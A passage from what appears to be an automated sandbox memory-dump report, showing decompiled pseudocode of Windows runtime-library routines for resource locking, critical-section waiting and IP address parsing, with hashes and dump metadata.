                                    														goto L37;
                                    													}
                                    													E022D5329(_t74, _t92);
                                    													_push(1);
                                    													return E022D53A5(_t92);
                                    												}
                                    											}
                                    										}
                                    									}
                                    								} else {
                                    									_t32 =  *(_t64 + 0x28);
                                    									continue;
                                    								}
                                    							} else {
                                    								_t71 =  *_t79;
                                    								__eflags = _t71;
                                    								if(__eflags > 0) {
                                    									while(1) {
                                    										_t57 = _t71;
                                    										asm("lock cmpxchg [edi], esi");
                                    										__eflags = _t57 - _t71;
                                    										if(_t57 == _t71) {
                                    											break;
                                    										}
                                    										_t71 = _t57;
                                    										__eflags = _t57;
                                    										if(_t57 > 0) {
                                    											continue;
                                    										}
                                    										break;
                                    									}
                                    									_t32 = _a4;
                                    									__eflags = _t71;
                                    								}
                                    								if(__eflags != 0) {
                                    									continue;
                                    								} else {
                                    									goto L19;
                                    								}
                                    							}
                                    						}
                                    						goto L37;
                                    					}
                                    					_t71 = _t71 | 0xffffffff;
                                    					_t32 = 0;
                                    					asm("lock cmpxchg [edx], ecx");
                                    					__eflags = 0;
                                    					if(0 != 0) {
                                    						goto L4;
                                    					} else {
                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                    						return 1;
                                    					}
                                    				}
                                    				L37:
                                    			}

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023122F4
                                    Strings
                                    • RTL: Re-Waiting, xrefs: 02312328
                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023122FC
                                    • RTL: Resource at %p, xrefs: 0231230B
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-871070163
                                    • Opcode ID: 1a7504556d0258b81da9abf751d96fee5655978ffd522f90f532ec4a25ba65cc
                                    • Instruction ID: 2523aac2dcf13f1049b931d98716c50856ad73bf3a2b81ae5b7a4463c62d9323
                                    • Opcode Fuzzy Hash: 1a7504556d0258b81da9abf751d96fee5655978ffd522f90f532ec4a25ba65cc
                                    • Instruction Fuzzy Hash: 7A510A716107116BEB65EBA4CC90FA77399EF44324F104629FD05DF284EBB1E942CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E022DEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				signed int _v24;
                                    				intOrPtr* _v28;
                                    				intOrPtr _v32;
                                    				signed int _v36;
                                    				intOrPtr _v40;
                                    				short _v66;
                                    				char _v72;
                                    				void* __esi;
                                    				intOrPtr _t38;
                                    				intOrPtr _t39;
                                    				signed int _t40;
                                    				intOrPtr _t42;
                                    				intOrPtr _t43;
                                    				signed int _t44;
                                    				void* _t46;
                                    				intOrPtr _t48;
                                    				signed int _t49;
                                    				intOrPtr _t50;
                                    				intOrPtr _t53;
                                    				signed char _t67;
                                    				void* _t72;
                                    				intOrPtr _t77;
                                    				intOrPtr* _t80;
                                    				intOrPtr _t84;
                                    				intOrPtr* _t85;
                                    				void* _t91;
                                    				void* _t92;
                                    				void* _t93;
                                    
                                    				_t80 = __edi;
                                    				_t75 = __edx;
                                    				_t70 = __ecx;
                                    				_t84 = _a4;
                                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                    					E022CDA92(__ecx, __edx, __eflags, _t84);
                                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                    				}
                                    				_push(0);
                                    				__eflags = _t38 - 0xffffffff;
                                    				if(_t38 == 0xffffffff) {
                                    					_t39 =  *0x239793c; // 0x0
                                    					_push(0);
                                    					_push(_t84);
                                    					_t40 = E022B16C0(_t39);
                                    				} else {
                                    					_t40 = E022AF9D4(_t38);
                                    				}
                                    				_pop(_t85);
                                    				__eflags = _t40;
                                    				if(__eflags < 0) {
                                    					_push(_t40);
                                    					E022F3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                    					asm("int3");
                                    					while(1) {
                                    						L21:
                                    						_t76 =  *[fs:0x18];
                                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                    							_v66 = 0x1722;
                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                    							_t76 =  &_v72;
                                    							_push( &_v72);
                                    							_v28 = _t85;
                                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                    							_push(0x10);
                                    							_push(0x20402);
                                    							E022B01A4( *0x7ffe0382 & 0x000000ff);
                                    						}
                                    						while(1) {
                                    							_t43 = _v8;
                                    							_push(_t80);
                                    							_push(0);
                                    							__eflags = _t43 - 0xffffffff;
                                    							if(_t43 == 0xffffffff) {
                                    								_t71 =  *0x239793c; // 0x0
                                    								_push(_t85);
                                    								_t44 = E022B1F28(_t71);
                                    							} else {
                                    								_t44 = E022AF8CC(_t43);
                                    							}
                                    							__eflags = _t44 - 0x102;
                                    							if(_t44 != 0x102) {
                                    								__eflags = _t44;
                                    								if(__eflags < 0) {
                                    									_push(_t44);
                                    									E022F3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                    									asm("int3");
                                    									E02332306(_t85);
                                    									__eflags = _t67 & 0x00000002;
                                    									if((_t67 & 0x00000002) != 0) {
                                    										_t7 = _t67 + 2; // 0x4
                                    										_t72 = _t7;
                                    										asm("lock cmpxchg [edi], ecx");
                                    										__eflags = _t67 - _t67;
                                    										if(_t67 == _t67) {
                                    											E022DEC56(_t72, _t76, _t80, _t85);
                                    										}
                                    									}
                                    									return 0;
                                    								} else {
                                    									__eflags = _v24;
                                    									if(_v24 != 0) {
                                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                    									}
                                    									return 2;
                                    								}
                                    								goto L36;
                                    							}
                                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                                    							_push(_t67);
                                    							_t46 = E022F4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                    							_push(_t77);
                                    							E02303F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                    							_t48 =  *_t85;
                                    							_t92 = _t91 + 0x18;
                                    							__eflags = _t48 - 0xffffffff;
                                    							if(_t48 == 0xffffffff) {
                                    								_t49 = 0;
                                    								__eflags = 0;
                                    							} else {
                                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                    							}
                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                    							_push(_t49);
                                    							_t50 = _v12;
                                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                    							_push(_t85);
                                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                                    							E02303F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                    							_t53 =  *_t85;
                                    							_t93 = _t92 + 0x20;
                                    							_t67 = _t67 + 1;
                                    							__eflags = _t53 - 0xffffffff;
                                    							if(_t53 != 0xffffffff) {
                                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                    							}
                                    							__eflags = _t67 - 2;
                                    							if(_t67 > 2) {
                                    								__eflags = _t85 - 0x23920c0;
                                    								if(_t85 != 0x23920c0) {
                                    									_t76 = _a4;
                                    									__eflags = _a4 - _a8;
                                    									if(__eflags == 0) {
                                    										E0233217A(_t71, __eflags, _t85);
                                    									}
                                    								}
                                    							}
                                    							_push("RTL: Re-Waiting\n");
                                    							_push(0);
                                    							_push(0x65);
                                    							_a8 = _a4;
                                    							E02303F92();
                                    							_t91 = _t93 + 0xc;
                                    							__eflags =  *0x7ffe0382;
                                    							if( *0x7ffe0382 != 0) {
                                    								goto L21;
                                    							}
                                    						}
                                    						goto L36;
                                    					}
                                    				} else {
                                    					return _t40;
                                    				}
                                    				L36:
                                    			}

                                    Strings
                                    • RTL: Re-Waiting, xrefs: 023124FA
                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0231248D
                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023124BD
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                    • API String ID: 0-3177188983
                                    • Opcode ID: 95828074d396b9b7c16398a9d47c607e1406fd3b7d7da97982e9648af45aab14
                                    • Instruction ID: e6458271dd17936399490a5696fefac0d5b1d6ca624e94c80587e2ced6ce94ad
                                    • Opcode Fuzzy Hash: 95828074d396b9b7c16398a9d47c607e1406fd3b7d7da97982e9648af45aab14
                                    • Instruction Fuzzy Hash: FC41E670A10314ABD724EFA8CC95FAB77A9EF44720F108A05F9599B2C4D774E941CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E022EFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				signed int _t105;
                                    				void* _t110;
                                    				char _t114;
                                    				short _t115;
                                    				void* _t118;
                                    				signed short* _t119;
                                    				short _t120;
                                    				char _t122;
                                    				void* _t127;
                                    				void* _t130;
                                    				signed int _t136;
                                    				intOrPtr _t143;
                                    				signed int _t158;
                                    				signed short* _t164;
                                    				signed int _t167;
                                    				void* _t170;
                                    
                                    				_t158 = 0;
                                    				_t164 = _a4;
                                    				_v20 = 0;
                                    				_v24 = 0;
                                    				_v8 = 0;
                                    				_v12 = 0;
                                    				_v16 = 0;
                                    				_v28 = 0;
                                    				_t136 = 0;
                                    				while(1) {
                                    					_t167 =  *_t164 & 0x0000ffff;
                                    					if(_t167 == _t158) {
                                    						break;
                                    					}
                                    					_t118 = _v20 - _t158;
                                    					if(_t118 == 0) {
                                    						if(_t167 == 0x3a) {
                                    							if(_v12 > _t158 || _v8 > _t158) {
                                    								break;
                                    							} else {
                                    								_t119 =  &(_t164[1]);
                                    								if( *_t119 != _t167) {
                                    									break;
                                    								}
                                    								_t143 = 2;
                                    								 *((short*)(_a12 + _t136 * 2)) = 0;
                                    								_v28 = 1;
                                    								_v8 = _t143;
                                    								_t136 = _t136 + 1;
                                    								L47:
                                    								_t164 = _t119;
                                    								_v20 = _t143;
                                    								L14:
                                    								if(_v24 == _t158) {
                                    									L19:
                                    									_t164 =  &(_t164[1]);
                                    									_t158 = 0;
                                    									continue;
                                    								}
                                    								if(_v12 == _t158) {
                                    									if(_v16 > 4) {
                                    										L29:
                                    										return 0xc000000d;
                                    									}
                                    									_t120 = E022EEE02(_v24, _t158, 0x10);
                                    									_t170 = _t170 + 0xc;
                                    									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                    									_t136 = _t136 + 1;
                                    									goto L19;
                                    								}
                                    								if(_v16 > 3) {
                                    									goto L29;
                                    								}
                                    								_t122 = E022EEE02(_v24, _t158, 0xa);
                                    								_t170 = _t170 + 0xc;
                                    								if(_t122 > 0xff) {
                                    									goto L29;
                                    								}
                                    								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                    								goto L19;
                                    							}
                                    						}
                                    						L21:
                                    						if(_v8 > 7 || _t167 >= 0x80) {
                                    							break;
                                    						} else {
                                    							if(E022E685D(_t167, 4) == 0) {
                                    								if(E022E685D(_t167, 0x80) != 0) {
                                    									if(_v12 > 0) {
                                    										break;
                                    									}
                                    									_t127 = 1;
                                    									_a7 = 1;
                                    									_v24 = _t164;
                                    									_v20 = 1;
                                    									_v16 = 1;
                                    									L36:
                                    									if(_v20 == _t127) {
                                    										goto L19;
                                    									}
                                    									_t158 = 0;
                                    									goto L14;
                                    								}
                                    								break;
                                    							}
                                    							_a7 = 0;
                                    							_v24 = _t164;
                                    							_v20 = 1;
                                    							_v16 = 1;
                                    							goto L19;
                                    						}
                                    					}
                                    					_t130 = _t118 - 1;
                                    					if(_t130 != 0) {
                                    						if(_t130 == 1) {
                                    							goto L21;
                                    						}
                                    						_t127 = 1;
                                    						goto L36;
                                    					}
                                    					if(_t167 >= 0x80) {
                                    						L7:
                                    						if(_t167 == 0x3a) {
                                    							_t158 = 0;
                                    							if(_v12 > 0 || _v8 > 6) {
                                    								break;
                                    							} else {
                                    								_t119 =  &(_t164[1]);
                                    								if( *_t119 != _t167) {
                                    									_v8 = _v8 + 1;
                                    									L13:
                                    									_v20 = _t158;
                                    									goto L14;
                                    								}
                                    								if(_v28 != 0) {
                                    									break;
                                    								}
                                    								_v28 = _v8 + 1;
                                    								_t143 = 2;
                                    								_v8 = _v8 + _t143;
                                    								goto L47;
                                    							}
                                    						}
                                    						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                    							break;
                                    						} else {
                                    							_v12 = _v12 + 1;
                                    							_t158 = 0;
                                    							goto L13;
                                    						}
                                    					}
                                    					if(E022E685D(_t167, 4) != 0) {
                                    						_v16 = _v16 + 1;
                                    						goto L19;
                                    					}
                                    					if(E022E685D(_t167, 0x80) != 0) {
                                    						_v16 = _v16 + 1;
                                    						if(_v12 > 0) {
                                    							break;
                                    						}
                                    						_a7 = 1;
                                    						goto L19;
                                    					}
                                    					goto L7;
                                    				}
                                    				 *_a8 = _t164;
                                    				if(_v12 != 0) {
                                    					if(_v12 != 3) {
                                    						goto L29;
                                    					}
                                    					_v8 = _v8 + 1;
                                    				}
                                    				if(_v28 != 0 || _v8 == 7) {
                                    					if(_v20 != 1) {
                                    						if(_v20 != 2) {
                                    							goto L29;
                                    						}
                                    						 *((short*)(_a12 + _t136 * 2)) = 0;
                                    						L65:
                                    						_t105 = _v28;
                                    						if(_t105 != 0) {
                                    							_t98 = (_t105 - _v8) * 2; // 0x11
                                    							E022C8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                    							_t110 = 8;
                                    							E022BDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                    						}
                                    						return 0;
                                    					}
                                    					if(_v12 != 0) {
                                    						if(_v16 > 3) {
                                    							goto L29;
                                    						}
                                    						_t114 = E022EEE02(_v24, 0, 0xa);
                                    						_t170 = _t170 + 0xc;
                                    						if(_t114 > 0xff) {
                                    							goto L29;
                                    						}
                                    						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                    						goto L65;
                                    					}
                                    					if(_v16 > 4) {
                                    						goto L29;
                                    					}
                                    					_t115 = E022EEE02(_v24, 0, 0x10);
                                    					_t170 = _t170 + 0xc;
                                    					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                    					goto L65;
                                    				} else {
                                    					goto L29;
                                    				}
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: __fassign
                                    • String ID:
                                    • API String ID: 3965848254-0
                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                    • Instruction ID: b205d90fa7c2ee39407aaec1d7af6a0fb66da7856774b3d75e45fed5aa71ed69
                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                    • Instruction Fuzzy Hash: CC91F331D2020AEEDF28DFD8C9457EEB7B4FF41308FA4806AD806A7655E7305A40DB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%